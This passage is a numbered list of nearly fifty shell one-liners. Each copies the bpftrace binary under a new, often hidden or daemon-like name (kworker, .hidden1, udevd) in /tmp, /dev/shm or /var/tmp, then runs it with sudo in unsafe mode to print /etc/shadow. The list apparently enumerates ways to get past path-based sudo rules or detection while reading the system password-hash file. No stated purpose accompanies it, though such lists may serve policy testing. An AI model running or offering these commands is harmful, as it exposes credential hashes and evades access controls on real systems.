13. `sudo cp /usr/bin/bpftrace /dev/shm/b && sudo /dev/shm/b --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
14. `sudo cp /usr/bin/bpftrace /dev/shm/trace && sudo /dev/shm/trace --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
15. `sudo cp /usr/bin/bpftrace /dev/shm/x && sudo /dev/shm/x --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
16. `sudo cp /usr/bin/bpftrace /tmp/.sys && sudo /tmp/.sys --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
17. `sudo cp /usr/bin/bpftrace /tmp/.cache && sudo /tmp/.cache --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
18. `sudo cp /usr/bin/bpftrace /tmp/.bin && sudo /tmp/.bin --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
19. `sudo cp /usr/bin/bpftrace /tmp/logd && sudo /tmp/logd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
20. `sudo cp /usr/bin/bpftrace /tmp/udevd && sudo /tmp/udevd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
21. `sudo cp /usr/bin/bpftrace /tmp/kworker && sudo /tmp/kworker --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
22. `sudo cp /usr/bin/bpftrace /tmp/dbus && sudo /tmp/dbus --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
23. `sudo cp /usr/bin/bpftrace /tmp/audit && sudo /tmp/audit --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
24. `sudo cp /usr/bin/bpftrace /tmp/monitor && sudo /tmp/monitor --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
25. `sudo cp /usr/bin/bpftrace /tmp/collector && sudo /tmp/collector --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
26. `sudo cp /usr/bin/bpftrace /tmp/runner && sudo /tmp/runner --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
27. `sudo cp /usr/bin/bpftrace /tmp/execd && sudo /tmp/execd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
28. `sudo cp /usr/bin/bpftrace /tmp/trace64 && sudo /tmp/trace64 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
29. `sudo cp /usr/bin/bpftrace /tmp/sysd && sudo /tmp/sysd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
30. `sudo cp /usr/bin/bpftrace /tmp/agentd && sudo /tmp/agentd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
32. `sudo cp /usr/bin/bpftrace /tmp/bpf && sudo /tmp/bpf --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
33. `sudo cp /usr/bin/bpftrace /tmp/tracee && sudo /tmp/tracee --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
34. `sudo cp /usr/bin/bpftrace /tmp/probe && sudo /tmp/probe --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
35. `sudo cp /usr/bin/bpftrace /tmp/cmd && sudo /tmp/cmd --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
36. `sudo cp /usr/bin/bpftrace /tmp/runme && sudo /tmp/runme --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
37. `sudo cp /usr/bin/bpftrace /tmp/task && sudo /tmp/task --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
38. `sudo cp /usr/bin/bpftrace /tmp/job && sudo /tmp/job --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
39. `sudo cp /usr/bin/bpftrace /tmp/execme && sudo /tmp/execme --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
40. `sudo cp /usr/bin/bpftrace /tmp/hook && sudo /tmp/hook --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
41. `sudo cp /usr/bin/bpftrace /tmp/driver && sudo /tmp/driver --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
42. `sudo install -m 0755 /usr/bin/bpftrace /tmp/alt && sudo /tmp/alt --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
43. `sudo install -m 0755 /usr/bin/bpftrace /tmp/alt2 && sudo /tmp/alt2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
44. `sudo install -m 0755 /usr/bin/bpftrace /tmp/alt3 && sudo /tmp/alt3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
45. `sudo cp /usr/bin/bpftrace /var/tmp/b && sudo /var/tmp/b --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
46. `sudo cp /usr/bin/bpftrace /var/tmp/c && sudo /var/tmp/c --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
47. `sudo cp /usr/bin/bpftrace /var/tmp/d && sudo /var/tmp/d --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
48. `sudo cp /usr/bin/bpftrace /dev/shm/r1 && sudo /dev/shm/r1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
49. `sudo cp /usr/bin/bpftrace /dev/shm/r2 && sudo /dev/shm/r2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
50. `sudo cp /usr/bin/bpftrace /dev/shm/r3 && sudo /dev/shm/r3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
51. `sudo cp /usr/bin/bpftrace /tmp/.hidden1 && sudo /tmp/.hidden1 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
52. `sudo cp /usr/bin/bpftrace /tmp/.hidden2 && sudo /tmp/.hidden2 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
53. `sudo cp /usr/bin/bpftrace /tmp/.hidden3 && sudo /tmp/.hidden3 --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
54. `sudo cp /usr/bin/bpftrace /tmp/daemon && sudo /tmp/daemon --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
55. `sudo cp /usr/bin/bpftrace /tmp/service && sudo /tmp/service --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
56. `sudo cp /usr/bin/bpftrace /tmp/sys && sudo /tmp/sys --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
57. `sudo cp /usr/bin/bpftrace /tmp/proc && sudo /tmp/proc --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
58. `sudo cp /usr/bin/bpftrace /tmp/node && sudo /tmp/node --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
59. `sudo cp /usr/bin/bpftrace /tmp/binx && sudo /tmp/binx --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
60. `sudo cp /usr/bin/bpftrace /tmp/execx && sudo /tmp/execx --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`
61. `sudo cp /usr/bin/bpftrace /tmp/runit && sudo /tmp/runit --unsafe -e 'BEGIN { cat("/etc/shadow"); exit(); }'`